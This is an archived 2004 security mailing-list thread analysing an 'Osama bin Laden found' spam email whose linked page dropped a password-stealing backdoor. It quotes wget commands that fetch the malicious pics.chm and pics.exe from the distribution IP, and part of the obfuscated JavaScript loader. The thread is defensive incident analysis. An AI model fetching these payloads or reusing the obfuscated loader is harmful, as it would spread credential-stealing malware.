Re: Massive increase in spam volume?

From: Don Wilder (don_at_thewilders.org)
Date: 04/26/04

Next message: Niek: "Re: Massive increase in spam volume?"

Previous message: Tom.Marchand_at_bcbsfl.com: "RE: Massive increase in spam volume?"
In reply to: Jay D. Dyson: "Re: Massive increase in spam volume?"
Next in thread: Niek: "Re: Massive increase in spam volume?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: "Jay D. Dyson" <jdyson@treachery.net>, Incidents List <incidents@securityfocus.com>
Date: Mon, 26 Apr 2004 10:33:22 -0400

This is actually an exploit and was discussed last week on
the Dshield email list. I am copying the findings here for
your information.

-Don
---------- cut from Dshield ------------------
From: "Blanchard, Joe" <BLANCHAJ@bsci.com>
Sender: <list-bounces@lists.dshield.org>
Subject: RE: [Dshield] Osama email
Date: Fri, 23 Apr 2004 14:05:26 -0400
To: "'General DShield Discussion List'"
<list@lists.dshield.org>



Not sure this is the same as noted on this article.
I'm seeing the following when hitting that link

html off of pics attempts to DL pics.chm, which in turn (I
believe)
DLs and runs pics.exe.
Oddly, while I've not enough time to fully investigate
this, it overwrites
my wmplayer.exe resulting in a change in size to 11k from
72k.
Variant maybe?

Cheers
-Joe

Follows is wgets of the item(s)
[root@ jgb]# wget http://220.95.231.54/pics
--13:59:16-- http://220.95.231.54/pics
=> `pics'
Connecting to 220.95.231.54:80... connected.
HTTP request sent, awaiting response... 302 Object Moved
Location: http://220.95.231.54/pics/ [following]
--13:59:17-- http://220.95.231.54/pics/
=> `index.html'
Connecting to 220.95.231.54:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,113 [text/html]

100%[====================================>] 4,113 17.54K/s
ETA
00:00

13:59:17 (17.54 KB/s) - `index.html' saved [4113/4113]

[root@ jgb]# more index.html
<script>
<!--
function S(){var s=location.href.substr(7);return
s.substr(0,s.indexOf('/'));}
function T(){return 'l';}
function U(){return 'C';}
function V(){return 'm';}
function W(){return '.';}
function X(){return 'E';}
function Y(){return 'i';}
function Z(){return 'x';}
document.write(unescape("%3"+U()+"HTML%3"+X()+"%3"+U()+"H"+X()+"AD%3"+X()+
"%
3"+U
()+"TITL"+X()+"%3"+X()+"where%20to%20buy%20v"+Y()+"agra%3"+U()+"/TITL"+X()
+"
%3"+
==========intentional left out full source
[root@jgb]# wget http://220.95.231.54/pics.chm
--14:00:56-- http://220.95.231.54/pics.chm
=> `pics.chm'
Connecting to 220.95.231.54:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 11,268 [application/octet-stream]

100%[====================================>] 11,268
23.72K/s ETA
00:00

14:00:57 (23.72 KB/s) - `pics.chm' saved [11268/11268]
[root@jgb]# wget http://220.95.231.54/pics.exe
--14:03:11-- http://220.95.231.54/pics.exe
=> `pics.exe'
Connecting to 220.95.231.54:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10,752 [application/octet-stream]

100%[====================================>] 10,752
21.65K/s ETA
00:00

14:03:12 (21.65 KB/s) - `pics.exe' saved [10752/10752]

> ----------
> From:
> list-bounces@lists.dshield.org[SMTP:list-bounces@lists.dshield.org] on
> behalf of Deb Hale[SMTP:haled@pionet.net]
> Sent: Friday, April 23, 2004 12:40 PM
> To: 'General DShield Discussion List'
> Subject: [Dshield] Osama email
>
> FYI ,
>
> I just received notification from my AV that the file that Bjorn
Stromberg
> emailed had the Exploit-MhtRedir.gen virus. It appears that is what they
> are
> calling this particular email. Symantec calls it Backdoor.Nibu.D and
says
> that it attempts to steal passwords and bank account information.
>
http://securityresponse.symantec.com/avcenter/venc/data/backdoor.nibu.d.ht
> ml
>
> Deb
>
>
_______________________________________________
list mailing list
list@lists.dshield.org
To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list

----------------------------------------------

On Sun, 25 Apr 2004 23:00:05 -0700 (PDT)
"Jay D. Dyson" <jdyson@treachery.net> wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>On Sat, 24 Apr 2004, Thamer Al-Harbash wrote:
>
>> I work at a large ISP in Canada and just a few hours ago
>>we've
>> experienced a massive increase in spam volume. The
>>volume is so high
>> it's bordering on being a denial of service attack.
>>
>> Does anyone know if there's a worm out in the wild
>>currently doing this?
>> I've confirmed with some of my collegues that other ISPs
>>are also
>> experiencing this.
>>
>> I'm interested in finding specific netblocks but the
>>spam seems to be
>> coming from everywhere.
>
> I'd say you're seeing the first wave of what appears to
>be a new
>worm. Earlier this evening I received about 20 copies of
>the same message
>(same subject, same body, different senders) which was
>titled, "Osama bin
>Laden found!" and listed a URL
>(http://220.95.231.54/pics/).
>
> Being naturally curious (and even more naturally
>paranoid), I went
>to the URL...but not with my browser. What I snagged was
>an obfuscated
>Javascript page which -- from what I could decipher at a
>glance -- was
>some kind of spam pitch for cheap prescription drugs. I
>didn't bother
>looking for a malicious payload after that.
>
> So what we have here could be a worm that spews spam.
> This sort
>of thing will pretty much render the idea of blackholing
>netblocks useless
>now, since unpatched Windows system are everywhere.
>
> That's my take. I look forward to hearing about what
>others have
>seen land in their inboxes.
>
>- -Jay
>
> ( (
> _______
> )) )) .--"There's always time for a good cup of
>coffee."--. >====<--.
>C|~~|C|~~| )>------ Jay D. Dyson - jdyson@treachery.net
>------<( | = |-'
> `--' `--' `-If you wanna make God laugh, tell him your
>plans.-' `------'
>
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.2.4 (TreacherOS)
>Comment: See http://www.treachery.net/~jdyson/ for
>current keys.
>
>iD8DBQFAjKVp6uxsHJ5aYG4RAsRGAJ484Fe0Rp1i+d/yt3yAnDPPRoSvwACcC8I0
>aSmguv2f7zEF4hky8xDx6D4=
>=ZZ/E
>-----END PGP SIGNATURE-----
>
>---------------------------------------------------------------------------
>----------------------------------------------------------------------------
>

---------------------------------------------------------------------------
----------------------------------------------------------------------------

Next message: Niek: "Re: Massive increase in spam volume?"

Previous message: Tom.Marchand_at_bcbsfl.com: "RE: Massive increase in spam volume?"
In reply to: Jay D. Dyson: "Re: Massive increase in spam volume?"
Next in thread: Niek: "Re: Massive increase in spam volume?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

[ADVISORY] NetCache URL DoS - Argentinian ISP
... No response from Speedy in the past 15 days. ... Connecting to 74.125.65.106:80... ... HTTP request sent, awaiting response... ...
(Bugtraq)
[Full-disclosure] Re: Re: Re: Links to Googles cache of626FrSIRTexploits
... Connecting to 72.14.203.104:80... ... HTTP request sent, awaiting response... ...
(Full-Disclosure)
Re: [Full-disclosure] Re: Re: Re: Links to Googles cache of626FrSIRTexploits
... Connecting to 72.14.203.104:80... ... HTTP request sent, awaiting response... ...
(Full-Disclosure)
Re: [patch 00/85] 2.6.27.12-stable review
... Hey Greg, you hid the file? ... Connecting to kernel.org|149.20.20.133|:80... ... HTTP request sent, awaiting response... ...
(Linux-Kernel)
Re: Has JKnowles.com.au gone under?
... Tried to place an online order a fortnight ago, but no confirmation ... email and no response to two emails and telephone nmber is not connecting. ...
(alt.horology)